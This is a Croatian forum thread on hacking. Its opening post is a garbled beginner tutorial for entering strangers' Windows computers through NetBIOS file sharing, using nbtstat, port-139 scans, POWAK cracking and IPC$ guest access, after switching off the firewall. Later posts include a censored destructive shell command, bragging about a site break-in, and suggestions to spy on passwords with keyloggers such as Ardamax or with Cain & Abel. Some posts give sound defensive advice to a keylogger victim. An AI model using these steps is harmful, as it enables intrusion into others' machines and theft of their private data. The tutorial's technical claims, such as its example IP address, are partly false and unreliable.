17.01.2007., 00:40
Što odma ismijavate čovjeka? Eto..ne zna ;)
Sine, zaboravi to i primi se nečeg gdje kopaš ili radiš dok stojiš.
Stvarno, nije lako biti haker..probao ja ući bivšoj na mail...al' ne ide :)
Internet protocol adress(IP) je brojčani identifikator nekog uređaja ili računala u mreži temeljenoj na TCP/IP protokolu.Svaka Ip adresa ima 32-bitni brojčani oblik,odnosno format kao četvorke odvojene razmacima,pri čemu svaki broj može biti 0 do 255.Primjer ip adrese može biti 1.170.10.259.Takav način se je prije koristio više dok nije došao FQDN način kakav imamo danas primjerice FQDN je http://infotechnology.blog.hr gdje umjesto brojeva upisujemo adresu.Mnoge možda zanima kako pronaći svoju ip adresu,za to postoje mnogi gotovi programi,ali oni su zapravo besmisleni.Svoju ip adresu možete saznati kliknuvši na ikonu na konekciju koja se kada je računalo spojeno na internet nalazi u donjem desnog kutu launch trake.Dvostruki klik na tu ikonu,details pokazat će vam neke detalje o uspostavljenoj konekciji,client ip adress vaša je ip adresa,a server ip adress je ip adresa servera na kojeg ste spojeni.To je jedan način,a drugi način je moguć iz command prompta,dakle odete na start/run/ i upišete cmd ili command i pokrenut će se crni ekran tj.command,u njemu sada upišete naredbu ipconfig i stisnete enter i dobit ćete svoju ip adresu na internetu ostvarenu ovom konekcijom.
Dakle,ovo su bila dva načina kako saznati vašu ip adresu,no možda vas zanima kako saznati ip adresu od nekog servera ili web stranice,za to posđstoje također gotovi programi od kojih preporučam "IPFinder" u kojem samo upišete adresu web stranice(hostname) i on će vam pronaći ip web stranice ili servera od kojga želite pronaći ip adresu.Ako vam se baš ne sviđa ovaj način,postoji još jedna način kako to saznati,a to je naravno preko commanda dakle,odete na run,upišete cmd ili command,i u crnom ekranu commanda upišete naredbu PING i adresu stranice ili servera primjerice PING infotechnology.blog.hr i dobit ćete ip adresu željene stranice ili servera.Ping je naredba(program) koja djeluje tako da šalje paket podataka na određenu adresu i čeka odgovor da li je određena internetska adresa dostupna,ako je kao odgovor dobiva se njena ip adresa.Dakle,ovo su bili neki od načina dobivanja ip adresa bez kojih hakeri i crackeri ne mogu zamisliti svoj rad jer je poznavanje adrese kompjutora koji se "napada"(target computer)neophodno da bi se "provalilo" u nečije računalo osobito sa NET BIOS tehnikom hakiranja.
--- Bios---
Bios je skraćenica za basic input/output sustav tj.osnovni ulazno izlazni sustav kojim omogučuje pokretanje računala.To ej u računalo unaprijed ugrađen(tvornički) softver koji nadzire sve akcije prilikom podizanja operativnog sustava.Bios sadrži sav kod potreban za nadziranje tipkovnice,zaslona,diska i ostalih pogona.Bios se nalazi na Rom(read only memory) tako da je zaštičen ako dođe do kvara diska.
---Netbios---
NetBIOS (Network Basic Input/Output System) razvijen je od strane tvrtke IBM i Sytek koji omogučuje pristup LAN(Local area network) resursima.Sigurno smo mnogo puta kliknuli na ikonu Network Neighborhood,no znamo li što se točno dogodi kada kliknemo na tu ikonu???Naše računalo pokušava dobiti imena računala spojenih na mrežu koristeći komandu Netbios.Osim toga daje različite informacije o kompjutorima spojenima u mreži npr.:
Username-korisničko ime
Dakle,ovo su bile neke osnovne informacije koje treba znati za korištenje ove tehnike,a sada prijeđimo na drugi dio tutoriala...
Second lesson
Comanda nbstat
Sa NetBiosom može se povezati koristeći naredbu Nbtstat.Naredba se upisuje u command prompt,ali!taj command moramo sami naredbi iz razloga što postoji caka za probijanje vatrozida.
Izrada commanda:Odemo na desktop,desni klik miša,new i izaberemo New tekst dokumnet,uđemo u njega i napišemo command.com te spremimo dokument pod imenom batch.bat dakle dobijemo batch aplikaciju.Na desktopu će se tada pojaviti ta batch aplikacija u koju uđemo dvostrukim klikom miša.
Ako nemožete napraviti taj batch file znači da vam je uključen vatrozid zato preporučam da ga isključite kada ovo radite.Nakon toga dok uđete u taj kreirani command trebala bi vam se pojaviti ova staza:c:\windows> .Ako želite dobiti informacije o svom računalu pišete:
c:\windows> nbtstat -A 127.0.0.1.Kod pisanja nbstat -A mora biti veliko !!!s dos nieje case sensitive ali....Nakon toga dobit ćete sljedeće informacije:
Name Number Type Usage
Odma da razjasnimo 127.0.0.1 ip adresa nije adresa nekog target computera već se naziva Loop back ip adresa i to je uvijek adresa vašeg kompjutora.
Dakle ovo je bio samo banalan primjer korištenja ove naredbe,a ako želite sve o ovoj naredbi u commandu upišite:c:\windows>nbtstat/? čime ćete dobiti detaljnije upute za korištenje ove naredbe.
2. Denial of Service
Žrtvu možete tražiti "pješice" koristeći naredbu netstat a-ip adresa,alo to nije potrebno jer postoje mnogi gotovi port skeneri.Dakle,ukoliko ne znate ip adresu računala u koje želite upasti možete je naći preko port skenera kao što su "orge" i još prema mojoj procjeni najbolje. "Xsharez" skenera.Ti skeneri pretražuju sve ip adrese na 139 portu i otkrivaju dali postoji moguća točka ulaza "point of entry".
Da se razumijemo ova tehnika se može izvoditi samo u windows os-u i primjenivati se samo na ona računala koja imaju uključenu opciju File and printer sharing.To i je jedna vrlo velika greška u windowsima jer ako ste primjerice spojeni u mrežu sa prijateljem i izmjenjujete podatke pristup vašim podacima imaju i sve ostale osobe sa interneta osim ako niste postavili premissions.
Dakle,pretpostavimo da sada već imate ip adresu računala u kojeg želite upasti pa prijeđimo na treći dio tutoriala sam čin hakiranja.!
treca lekcione
Uzmimo primjerice da je ip adresa kompjutera kojega želite hakirati 193.198.136.156(molim da ne hakirate taj kompjuter).U command promptu pišete slijedeće:
c:\windows>nbtstat -A 193.198.126.156 i pritisnete enter.Uzmimo da ćete kao povratnu informaciju dobiti slijedeće:
Name Type Status
<20> UNIQUE Registered
Broj 20 pokazuje da žrtva ima uključenu opciju File and printer Sharing dakle da shera podatke na netu.
Ako niste dobili ovakve povratne informacije to znači osoba nema uključenu opciju File and printer sharing ili da je port 139 za tu ip adresu zatvoren jer ona ne postoji.
Ako ste dobili dobre povratne informacije naš sljedeći korak je da vidimo koje to foldere žrtva shera.
Za to koristimo naredbu:
ComputerNameGoesHere
CDISK Disk
"Disk" pokazuje da žrtva shera podatke na disku C,a osim toga dobijete i informacije kao:
ComputerNameGoesHere
HP-6L Print
Poznati su slučajevi kada su osobe imale uključenu opciju sheranja printera,ali ne znajući da to može imati i svoju lošu stranu jer su im krekeri tada slali prijeteće poruke koristeći njihov printer.
Dakle,sada smo u stanju dijeliti podatke sa žrtvinog diska ili foldera,a ako je uključena opcija Printer sharing i njegov printer.Sada ćemo se priključiti na hard disk target computera.
"k" možemo zamjeniti sa bilo kojim slovom, pod CDISK upisujemo ime diska target computera.
Nakon ovoga odete ne desktiop,My Computer i vidjet ćete osim imena svojih diskovnih pogona i ime Target computera,sada samo dvostruki klik i u njemu ste(ovisi koju vrstu veze koristite,ako je to Dsl to će biti vrlo brzo,ako koristite 56k modem to će potrajati nekoliko minuta.
Za OS windows 95.98 i mil koristimo program POWAK, a sve što trebamo upisati je ip adresa žrtve i share ime(u našem slučaju Cdisk) i program će razbiti enkripciju za par sekundi.
Ako koristimo WIn xp,Nt ili 2000 koristimo IPC$ ,to nije program za razbijanje šifre,već samo string koji od operativnog sustava traži da nam dade pristup računalu kao gost,bez da nas pita šifru.
I nakon toga dobit ćete pristup žrtvinom računalu tj. podacima koje shera i bit sposobni čitati njegove tajne E-mailove,downloadati glazbu...naravno sve će ovisiti o brzini vaše veze.
to je to maj pipl
u vezi komande nbtstat,
da lil bi ona trebala da radi i ako je win instaliran na nekoj drugoj particiji,
ja sam to pokusao i nece da radi,i kada napravim onaj fajl i pokrenem ga ne pojavimi se c:\windows> vec na putanji gde se nalazi(desktop-u)
jos nesto, da li se ip adresa moze naci i u mail adresi
unapred hvala!:)
nenoXtreme
17.03.2007., 00:33
a majke ti quota!!! :eek:
jel bilo baš nužno qoutat cijeli post? :cool:
ima bit da ce ovi post pokrenut lavinu pitanja...:cerek:
upozorenje hakerima: kad skidate podatke sa zrtvinog hakiranog diska, pazite da ne skinete koji virus...:cool:
da li se ip adresa moze naci i u mail adresi
Može :D
A onaj ogromni kvout, ko da me učiš provaljivat u otključanu kuću... :rofl:
jbg mrzime ponovo sve citati da bi nasao ono sto bi trebalo da se pita:D
Protagonist
05.08.2007., 11:38
hakeri :)
hakeri u hr postoje, koliko se god neki zezali ovdje :)
uputit cu vas na nekolicinu,
* ovdje se moze naci manji broj vrhunskih profesionalaca www.core-dump.com.hr , neki su bili autori za legendarni Phrack magazin
* ovdje se moze naci nekolicina, usenet: hr.comp.os.unix
* ovdje je jedan security researcher www.student.foi.hr/~ljuranic/ koji je danas cini mi se u security kompaniji www.infigo.hr
* jedan izuzetan haker je svima poznati kost kost.com.hr/blog/ sa HULKa
* hrpa hakera se moze naci na razmjenavjestina.org
* nekolicina se nekada okupljala oko sysphere.org
* hakeri sa cijelog balkana se okupljaju oko groups.google.com/group/nistasenecedogoditi/
* pulski hakeri odnosno monte paradiso hack lab fazan.org
* mislim da su neki "zli" momci bili na blackhat.org
* pred nekoliko mjeseci hrpa hakera se okupila na otvorenikod.org konferenciji, cisti dokaz da hakeri u hr postoje i bome nisu izumrla vrsta :)
a svi buduci hakeri imaju priliku ovo ljeto posjetiti hakersku konferenciju, sastanak, kamp koji ce biti u Puli vise informacija na www.yaxwe.org
dalmacija77
08.11.2007., 18:46
mene zanima ako mi netko uđe u komp dali je dovoljno da se diskonektiram s neta?
Ne, moras ga odnjeti u susedovo dvoriste i zakopat.Na njemu zapali lomacu i spali sve cdeje i dvdeje.
Dovoljno se diskonektirat, za kasniju zastitu koristi google.
sotonik123
08.11.2007., 19:10
Ruski rulet za hakere na Linuxu:
Upozorenje: NE pokrećite slijedeću komandu u konzoli:
[ $[ $RANDOM % 6 ] == 0 ] && <cenzura> || echo "You live"
Pomalo cenzurirano... Link za necenzuriranu verziju ovdje: http://bash.org/?96164
:mig:
red_shrike
08.11.2007., 20:27
ne bi li to morao pokrenuti koa root. Sumnjam da bi obični korisnik uspio izbrisat /
sotonik123
08.11.2007., 20:40
ne bi li to morao pokrenuti koa root. Sumnjam da bi obični korisnik uspio izbrisat /
Vjerojatno... ali zašto sam ne probaš?:cerek:
ma pusti to, najbolje ti je tuzit toga za klevetu i nanosenje teskih dusevnih boli...s tim ces daleko bolje proc:D
KinkyGay
25.11.2007., 03:45
Evo kako pravi hakeri razgovaraju:
[Sat 22:00] <QKrun1x> briga me dal je to on, samo znam da ce ga Johnny prijavit na Abuse Angry
[Sat 21:53] <gvozdeni> nemojte se ljutit sta san ja to rekao...tnx
[Sat 21:52] <gvozdeni> prenosin poruku od nooba hackonea kaze da ovo na forumu nije on
[Sat 21:42] <phAnt0m h4ck3r> lool
[Sat 21:37] <QKrun1x> iskljucili su ga, brzo je otisel susjedu da se pozdravi s nama Grin
[Sat 21:28] <Wani> Zar si ti stvarno iz Opz?!?!..haha...ccc,...aj da mi je i to bilo cut......BTW.Ja sam iz Mtk!
[Sat 21:15] <David Nikolic> ajde bok curke
[Sat 21:13] <phAnt0m h4ck3r> sta su ti ga iskljucili...lol
[Sat 21:12] <David Nikolic> odoh ja curice
[Sat 21:12] <QKrun1x> Johnny says: Samo ce mu iskljucit net na neko vrijeme
[Sat 21:09] <phAnt0m h4ck3r> eto hackone pogledaj
[Sat 21:08] <QKrun1x> a sakrio ip?
[Sat 21:07] <David Nikolic> naravno da jesam
[Sat 21:07] <QKrun1x> nadam se da si pobrisao logove Cheesy
[Sat 21:06] <QKrun1x> ili stric?
[Sat 21:06] <phAnt0m h4ck3r> aj sad reci da ti i stari ima veze u muriji....
[Sat 21:05] <David Nikolic> he he, ma nemogu mi nista
[Sat 21:05] <QKrun1x> Johhny says: Pusa od Đonsona i ak zatrebas proxy kad te odblokiraju, javi se, imam privatni.
[Sat 21:04] <QKrun1x> trebat ce ti
[Sat 21:04] <phAnt0m h4ck3r> sretno...hackone
[Sat 21:04] <David Nikolic> Za sta si ga ti koristio ?
[Sat 21:03] <QKrun1x> lol, rofl, ja sam koristio proxy Wink
[Sat 21:03] <David Nikolic> Pa sta onda ?
[Sat 21:02] <QKrun1x> Naravno, Abuse je obavjestana o tome, kao i o ip-evima... to sam videl na warez-hr.org
[Sat 21:02] <David Nikolic> zasto kriv ?
[Sat 21:02] <phAnt0m h4ck3r> lool
[Sat 21:01] <QKrun1x> da, i na kraju hackone kriv
[Sat 21:01] <David Nikolic> onda znas i koji je pass od admincpa ? imaju jos neku zastitu pa onda znas taj pass ?
[Sat 20:59] <phAnt0m h4ck3r> eh....dok smo se mi setali tamo po admin cp-u.....
[Sat 20:58] <David Nikolic> aha, mozes bolje ?
[Sat 20:58] <QKrun1x> ma nemoj... Wink
[Sat 20:54] <David Nikolic> hacknuo sam warez-hr
[Sat 20:51] <QKrun1x> Grin
[Sat 20:51] <QKrun1x> ja sam odgovorio umjesto njega
[Sat 20:43] <phAnt0m h4ck3r> odgovori na temu
[Sat 20:42] <David Nikolic> sta je to puno ?
[Sat 20:41] <phAnt0m h4ck3r> puno toga i odgovori vec jednom na temu
[Sat 20:33] <David Nikolic> pa sta imate protiv mene ?
[Sat 20:30] <phAnt0m h4ck3r> koj kurac oces hackone?
[Sat 20:20] <David Nikolic> bok svima
Inače ovo je ekipa koja ruši blogove i znam da je ovaj mali kretenčić David Nikolić iz Metkovića i da je prijavljen na Abuse!:cerek:
Mali je iz Opuzena i totalni je tenkre
KinkyGay
25.11.2007., 13:13
Da,saznao sam to! :cerek:
Ninojoj
13.12.2007., 18:46
Ni taj link ti ne radi :confused: Pa daj nemoj davat linkove koji ne rade, prijavit ću te moderatoru :top:
koji glupso
Prijavija san te moderatoru :s
Michael___Myers
22.02.2008., 20:13
IP
--- Bios---
---Netbios---
Username-korisničko ime
Second lesson
Comanda nbstat
Name Number Type Usage
2. Denial of Service
treca lekcione
Name Type Status
<20> UNIQUE Registered
Za to koristimo naredbu:
ComputerNameGoesHere
CDISK Disk
ComputerNameGoesHere
HP-6L Print
to je to maj pipl
kad upisem nbtstat -A (ip adresa) pise samo:
Local Area Connection:
Node IpAdress: [ip adresa] Scope Id: []
Host not found.
Probao sam sa vise ip adresa al nece. Ne znam u cemu je problem :ne zna:
Gutaperka
25.03.2008., 21:06
ima li nešto dobro što se može hakiranjem napravit?Koliko vidim sve se svodi na to da se nekome napravi veća ili manja šteta ali također niko ne bi volio da se njemu tako nešto učini.Pa ima li nešto dobroga što se time može učinit?
Cool Zero
30.03.2008., 21:54
a neka dvojica iz zadra koja su u pentagon provalili...eee
ali su ih ulovili
invertor
13.06.2008., 19:59
Haha.. Svi bi vi hakirali a niko nema pojma o programskim jezicima ili nedaj bože asembleru.
Eh netko je napisao može svatko bit hacker, može ali što je pojam hackera? Osoba koja koristi svoju inteligenciju i znanje sa svrhom da bi se domogla love.
Mislim da toga u hrv nema a ni neće bit jer su ljudi prezaposleni drugim stvarima. To se više može pripisat amerima.
A hakiranje tipa razbijanje wep ključa, razbijanje šifre windozera, pronalaženje user i pass od accounta sa kojeg se spajaš na net, ip adrese ili takve šeme su igre za djecu i to može svako ko ima pristup google-u a i ubiti to nije hackiranje nego korištenje nečega što je već netko razvalio. To je isto ko da netko kaže ja sam hacker znam se ulogirat u vindozere..
Ubiti ta "razbijanja" koja sam naveo bi trebao znati svaki korisnik računala koji se imalo više kuži od instaliranja igrica, jer su to osnove korištenja računala bar po meni.
konjska balega
02.07.2008., 10:56
Molim pametnije i iskusnije da odgovaraju:
Na koje se sve načine(barem ih navedite par i objasnite) može nešto "hackirati".
Kako se može to raditi pomoću c-jezika, qbasica, googla...
bruno1211
17.07.2008., 15:54
tema je najsmješnija na forumu pogotovo stariji postovi
NOW PANIC!
23.07.2008., 17:19
Molim pametnije i iskusnije da odgovaraju:
Na koje se sve načine(barem ih navedite par i objasnite) može nešto "hackirati".
Kako se može to raditi pomoću c-jezika, qbasica, googla...
hakirati se može na razne načine ovisi šta napadaš npr. websajtovi se provaljuju prek sql injekcija, XSS-rupa u css jeziku (najčešća kod foruma)...
postoje i LDAP injekcije, javasciript injekcije...i najjednostavnije je za koristiti shell skripte koje omogućuju promjenu html-ovog koda stranice
serveri se mogu na razne naćine od DoS denial of service koje se pokreću iz CMD-a(treba aktivni perl),buffer overflowa, PEB-process enviroment blocking, heap owerflow i još mnogi drugi....kompjuteri se najćešče preko exploit-a
----------------
to se može i preko asemblera i onog kojim se ja bavim perl
koja glupa tema...svako bi hakirao a bez ikakvog znanja...:ne zna:
blaster121
23.07.2008., 18:15
kad upisem nbtstat -A (ip adresa) pise samo:
Local Area Connection:
Node IpAdress: [ip adresa] Scope Id: []
Host not found.
Probao sam sa vise ip adresa al nece. Ne znam u cemu je problem :ne zna:
to mozes samo onima koji imaju na racunalu ukljuceno file sharing.
ima puno dobrih tutoriala na webu ali je potrebno puno volje i strpljenja,instant hacking postoji samo u filmovima
Imam jedno laičko pitanje koje ne spada direktno ovdje, ali nisam dobila odgovor tamo "gdje spada":rolleyes:, pa pitam hackere:mig:
Može li se SMS iz inboxa prepraviti (izmijeniti sadržaj) tako da ostane u inboxu?
Imam potpuno oprečna "mišljenja", dakle, jedni kažu DA, drugi NE...
:ne zna:
probaj ode (http://www.scampers.org/steve/sms/tools.htm) nac nesto:)
sve mi se nekako cini da neko tu nekog vara...:cerek:
edit: i nisan ja hacker da ne bi neko nesto...:D
probaj ode (http://www.scampers.org/steve/sms/tools.htm) nac nesto:)
sve mi se nekako cini da neko tu nekog vara...:cerek:
Ma ne radi se o tome da mi to treba da ja mijenjam poruke, nego zato da znam kako reagirati ako sumnjam u to da li se može... jednostavno: DA ili NE... uopće ne trebam upute... samo da znam "odbrusit": to se može/ne može
(ionako se ne razumijem toliko u kompjutore da i ovo što je gore mogu shvatit najbolje...:eek:)...
Može, ovisi o modelu moba ili opremi kojom se raspolaže.
mats990
09.10.2008., 18:35
evo jedno pitanje, nevezano uz provaljivanje neznam cega vec o ZAKONU RH. Znaci zanima me gdje mogu pogledat zakon o cyber kriminalu. i nemojte mi reci narodne novine jer nisam nist nasao, tj vjerojatno neznam sto/gdje traziti... pa ako moze neke "smjernice" iliti tips da pronadem. ustvari mene samo zanima je li zabranjeno spajanje na tudi wireless ako je on nezasticen.
dobrota
09.10.2008., 19:50
evo jedno pitanje, nevezano uz provaljivanje neznam cega vec o ZAKONU RH. Znaci zanima me gdje mogu pogledat zakon o cyber kriminalu. i nemojte mi reci narodne novine jer nisam nist nasao, tj vjerojatno neznam sto/gdje traziti... pa ako moze neke "smjernice" iliti tips da pronadem. ustvari mene samo zanima je li zabranjeno spajanje na tudi wireless ako je on nezasticen.
nije, ako te ne uvate...
mats990
09.10.2008., 20:38
grrr, ajde zaboravite zadnju recenicu koju sam napisao u postu. meni netrebaju vasa misljenja koliko je tesko, moguce da te nade netko i te stvari vec mi treba neki link na zakon čl. taj i taj. posto nemam veze o politici/pravu nemam pojma gdje da trazim tako nesto. mozda sam trebao postaviti ovo pitanje u podforumu pravo ali mislim da ljudi i ovdje znaju sto trebam.
btw dobrota nhf nisi ti nista krivo rekao ali nisam trazio takav odgovor
mats990
11.10.2008., 18:58
dobio sam odgovor na moje pitanje, ako nekog zanima:
http://www.forum.hr/showthread.php?t=384279
Moby Master
12.10.2008., 09:59
Evo mene... Nikad još nisam čitao ovu temu...Nije uopće.... Čitao sam negdje... Ali je zabranjeno ako mu probiješ zaštitu kao što su to učinili meni...:mig:
Ove godine sam bio na Sinergiji, i bilo je odrzano takmicenje hakera „Hack The Gate” (HTG).
Radilo se o nekoj "internet prodavnici", naravno sve je to bilo simulirano.
Mogu reci da je zainteresovanost za navedeno bila poprilicna.
citat:
Igra se odvija u dva ili tri kruga. Prvi krug je dostupan svim registrovanim korisnicima „Sinergije” koji se prijave za ovu igru. U ovom krugu postoji pet nivoa poređanih po težini. U svakom nivou učesnik dobija zadatak koji, da bi rešio, mora da otkrije odgovarajući sigurnosni propust. Kada, koristeći propust igrač ispuni zadatak, propust se automatski sanira, a zatim se kreira novi, namenjen sledećem nivou. Ako svih pet nivoa razigravanja pređe veći broj ljudi, organizovaće se drugi krug s težim zadacima, posle koga bi se odabralo pet najboljih igrača, koji postaju učesnici finala koje će se održati na samoj „Sinergiji”. Finale će zapravo biti uživo nadmetanje između pet najbolje plasiranih igrača iz prethodnog kruga. Posetioci PC Festa u Expo Centru će biti u prilici da uživaju u pravom okršaju opasnih momaka uživo, kao i svi ostali posetioci Sinergije posredstvom video-bima.
Osim slave i hakerskog imidža, najbolje pojedince čekaju nagrade.
Da biste učestvovali u igri, potrebno je da pošaljete zahtev za otvaranje naloga, slanjem mejla na htg@mssinergija.net.
Moby Master
20.11.2008., 14:36
Ove godine sam bio na Sinergiji, i bilo je odrzano takmicenje hakera „Hack The Gate” (HTG).
citat:
Igra se odvija u dva ili tri kruga. Prvi krug je dostupan svim registrovanim korisnicima „Sinergije” koji se prijave za ovu igru. U ovom krugu postoji pet nivoa poređanih po težini. U svakom nivou učesnik dobija zadatak koji, da bi rešio, mora da otkrije odgovarajući sigurnosni propust. Kada, koristeći propust igrač ispuni zadatak, propust se automatski sanira, a zatim se kreira novi, namenjen sledećem nivou. Ako svih pet nivoa razigravanja pređe veći broj ljudi, organizovaće se drugi krug s težim zadacima, posle koga bi se odabralo pet najboljih igrača, koji postaju učesnici finala koje će se održati na samoj „Sinergiji”. Finale će zapravo biti uživo nadmetanje između pet najbolje plasiranih igrača iz prethodnog kruga. Posetioci PC Festa u Expo Centru će biti u prilici da uživaju u pravom okršaju opasnih momaka uživo, kao i svi ostali posetioci Sinergije posredstvom video-bima.
Da biste učestvovali u igri, potrebno je da pošaljete zahtev za otvaranje naloga, slanjem mejla na htg@mssinergija.net.
Da, naravno!
:rolleyes:
username:)
28.01.2009., 20:24
Zamolila bih nekoga za pomoć...
Nedavno mi je jedan decko rekao da mi je provalio u laptop i uzeo si neke file-ove...
Kaze da je to napravio pomocu moje IP adrese (koliko i sama znam da nije problem doci do nje), e sad, takodjer je koristio nekakav program koji pomocu IP adrese izbaci sva moguca korisnicka imena i passworde (znaci sve gdje sam registrirana na netu)... Isto tako je i citao sve moje poruke s mobitela (preko interneta)...
E sad, mene zanima da li je moguce zastiti se nekako od ovakvih provala i programa, i zanima me da li mu je olaksalo provalu to sto zna moj password za ulaz u windowse..
Prema tome sto je on napravio, znaci da netko tko se kuzi u to i ima odredjene programe, moze upadati kome god zeli u komp ili accounte ????
Nekome bih bila jako zahvalna da mi objasni neke stvari...
Lijep pozdrav
xPsycho
28.01.2009., 21:55
taj te lik zajebava neviruj mu ..
da sad puno ne objasnjavam ...jednostavno mu ne viruj ..
28.01.2009., 22:26
taj te lik zajebava neviruj mu ..
da sad puno ne objasnjavam ...jednostavno mu ne viruj ..
Ma ne zajebava,najozbiljnije, nikada nije uzeo moj mobitel u ruke, i neki dan mi je ispricao u detalj sve moje poruke s kim sam se dopisivala, oko cega i sl..Rekao mi koju sam zadnju poruku primila, od koga, sta pise u njoj, a ja sam tu poruku primila od frendice taman prije no sto cu doc kod njega..:confused:
A te fileove koje mi je uzeo s laptopa, mi je sinoc pokazao na svom kompu...a znam da mu ih nikada nisam dala...:confused:
Nisam mu ni ja vjerovala, a onda mi je rekao -Hoces sad da ti kazem tvoj pass za npr. facebook. Ja reko ajde bas da i to vidim (a ja ga mjenjala dan-dva prije, jer sam skuzila da me izbacuje).. I on u roku 3 minute -Pass za facebook ti je taj i taj, pass za dnevnik.hr ti je taj i taj, za forum.hr taj i taj.. (sve to na njegovom laptopu jer bili smo kod njega...):confused:
Ne bih bas rekla da laze, dosta se kuzi u to, pokazao mi je te programe i rekao da zna dosta toga, kao npr. maznuti novce (internet bankarstvo), postavljati sam svoje cijene na eBay-u, mjenjati ih, kupovati na tudje kartice i sl...
Malo sam zaprepastena.. Mislim da mi ipak ne mulja...:ne zna:
Lijep pozdrav
dobrota
28.01.2009., 22:30
Ma ne zajebava,najozbiljnije, nikada nije uzeo moj mobitel u ruke, i neki dan mi je ispricao u detalj sve moje poruke s kim sam se dopisivala, oko cega i sl..Rekao mi koju sam zadnju poruku primila, od koga, sta pise u njoj, a ja sam tu poruku primila od frendice taman prije no sto cu doc kod njega..:confused:
A te fileove koje mi je uzeo s laptopa, mi je sinoc pokazao na svom kompu...a znam da mu ih nikada nisam dala...:confused:
Nisam mu ni ja vjerovala, a onda mi je rekao -Hoces sad da ti kazem tvoj pass za npr. facebook. Ja reko ajde bas da i to vidim (a ja ga mjenjala dan-dva prije, jer sam skuzila da me izbacuje).. I on u roku 3 minute -Pass za facebook ti je taj i taj, pass za dnevnik.hr ti je taj i taj, za forum.hr taj i taj.. (sve to na njegovom laptopu jer bili smo kod njega...):confused:
Ne bih bas rekla da laze, dosta se kuzi u to, pokazao mi je te programe i rekao da zna dosta toga, kao npr. maznuti novce (internet bankarstvo), postavljati sam svoje cijene na eBay-u, mjenjati ih, kupovati na tudje kartice i sl...
Malo sam zaprepastena.. Mislim da mi ipak ne mulja...:ne zna:
Lijep pozdrav
napravi on line scan http://www.kaspersky.com/virusscanner
vjerojatno ti je ubacija keyloger
28.01.2009., 22:57
napravi on line scan http://www.kaspersky.com/virusscanner
vjerojatno ti je ubacija keyloger
He, nije nista nasao...
Da odustanem ili?
xPsycho
29.01.2009., 12:36
sta odustat od scana ?
pusti neka scan završi i ako sta nađe napiši točan naziv ode sta je nasa
29.01.2009., 12:56
sta odustat od scana ?
pusti neka scan završi i ako sta nađe napiši točan naziv ode sta je nasa
Ma ne, skenirao je do kraja, napravio je i internet scan i komp sam skenirala s kasperskim (s tim da sam iskljucila svoj antivirus kako mi je i pisalo), pitam da li da odustanem tj. da li mi je uzalud pokusavat se zastiti od provala...
e da, sjetila sam se jednog od programa koji je koristio, zove se ardamax..
pozz :w
božesačuvaj
29.01.2009., 13:09
.....
Nije ni čudo što zna sve tvoje "tajne"!
EDIT:Zna svaku tipku koju si pritisnula!
xPsycho
29.01.2009., 13:11
nemoj odustajat...
taj ardamax je keylogger
to ce ti dobrota objasnit bolje
ja sad moram u skolu .. :top:
božesačuvaj
29.01.2009., 13:13
http://www.softpedia.com/get/Antivirus/Anti-Keylogger-Elite.shtml
29.01.2009., 13:33
"Sorry, this version of anti-keylogger elite only can been run by user have administrator privilege."
to mi izbaci kad ga (anti keylogger) pokusam pokrenuti ...
"Sorry, this version of anti-keylogger elite only can been run by user have administrator privilege."
to mi izbaci kad ga (anti keylogger) pokusam pokrenuti ...
znaći da kod pokretanja tog programa trebaš imati administratorske ovlasti
pokreni ga u safe mode
Moby Master
29.01.2009., 17:43
Trebaš biti administator,vidiš, ubacio ti je ardamaxa, a sada ga ti izbriši,pa da vidimo onda hoće li taj znati pass!;)
dobrota
29.01.2009., 17:53
kaspersky prepoznaje ardamax-a
promijeni sve lozinke
29.01.2009., 18:45
E, ovako...
Opet sam danas skenirala pomocu kasperskog, i komp i internet scan... Nije nasao bas nista...
Skinula sam antikeylogger, pokrenula ga u safe mode-u, trazio mi je kod, medjutim do koda nisam mogla doci jer mi se nije mogao spojiti na net, nije nasao niti jednu mrezu, odem na troubleshoot, kaze ne moze ni troubleshoot, a onda ovo: Windows did not detected any networking software.
Sta sada?
Dobrota, na koje lozinke mislis? Znaci bas sve?
Decki hvala vam
29.01.2009., 18:58
Sad sam pricala s deckom , kaze provalio je pomocu DOS-a i nekoliko programa (nece da kaze koji su), kaze da su to sve crvi koji su pisani (programirani) rucno...
xPsycho
29.01.2009., 19:14
kad ti se pojavi oni ekran za biranje safe moda odi na safe mode with network
29.01.2009., 19:18
kad ti se pojavi oni ekran za biranje safe moda odi na safe mode with network
aaaa vidis to mi nije palo na pamet mada mi je bilo napisano, a zensko, sta's, thnx
dobrota
29.01.2009., 19:48
Sad sam pricala s deckom , kaze provalio je pomocu DOS-a i nekoliko programa (nece da kaze koji su), kaze da su to sve crvi koji su pisani (programirani) rucno...
sa prijateljičinog kompjutera promini sve lozinke...windows formatiraj i ponovno instaliraj i nedaj dećku blizu kompjutera:)
Znatiželjko
29.01.2009., 22:42
O.K. zato ti instaliraj KeyScrambler,ako uspiješ u safe modu ! http://www.qfxsoftware.com/
U besplatnoj verziji tog programa štiti sve što tipkaš u Internet Exploreru i Firefoxu,tako što brka tipke koje ti stvarno pritišćeš i predstavlja ih kao druge tipke.Jedan je to od poznatijih anti-keylogging programa.:top:
Nauci
tcpdump-om
Ali mozes jednostavnije skini neki firewall i on ce pokazati ako se netko bude spajao ili slao podatke recimo keylogger i vidit ces gdje salje
31.01.2009., 16:58
Ok decki, hvala vam puno na svim savjetima:s...Ne kuzim se u to koliko i vi, ali bar znam gdje treba potraziti pomoc:top:
Heh, ovaj se nije nadao ovak nest pametno ;)
Lijep pozdrav :mig:
Leecher
08.02.2009., 22:40
Ne može se bit 1337 h4XoR ako se nezna pisat hakerskom abecedom:
http://en.wikipedia.org/wiki/Leet :top:
14.02.2009., 22:43
hmm.. nakon svih tih pizdarija s njim, skinula sam si i sama ardamax, mada jos nisam naucila full se koristiti njime, no ima dana...
zanimljiv programcic moram priznati...
mada vjerujem da ima jos zanimljivijih, ima tko kakav prijedlog?
konjska balega
18.02.2009., 16:19
Većina postova na ovu temu je bilo preser*vanje nekih ljudi i pametovanje o tome kako nitko ništa ne zna(osim njih samih), pa bi vas molio ubuduće da se takvi ne javljaju(a još bolje da moderatori malo urede ovaj topic i rješe se junka).
Mene sada zanima nešto ovog tipa:
citat:
Da li ima još takvih nekih stvari ili barem sličnih, jer se na ovo nisam mogao prijavit(e-mail nije u upotrebi).:flop:
sobravia
08.03.2009., 16:29
Skini program ABEL.No zipa jer kome ga nađu u EU u compu slijedi zaplijena opreme i masna kazna
sada ću da isprobam tog abela ali bolje rješenje je wireshark sa keylogerom koji će pohvatati sve username-ove i passworde
ali to se nesme delati
Nije mi jasno, kak bitove prebacuješ iz ruke u ruku? Jel se može s tim žonglirat?
sobravia
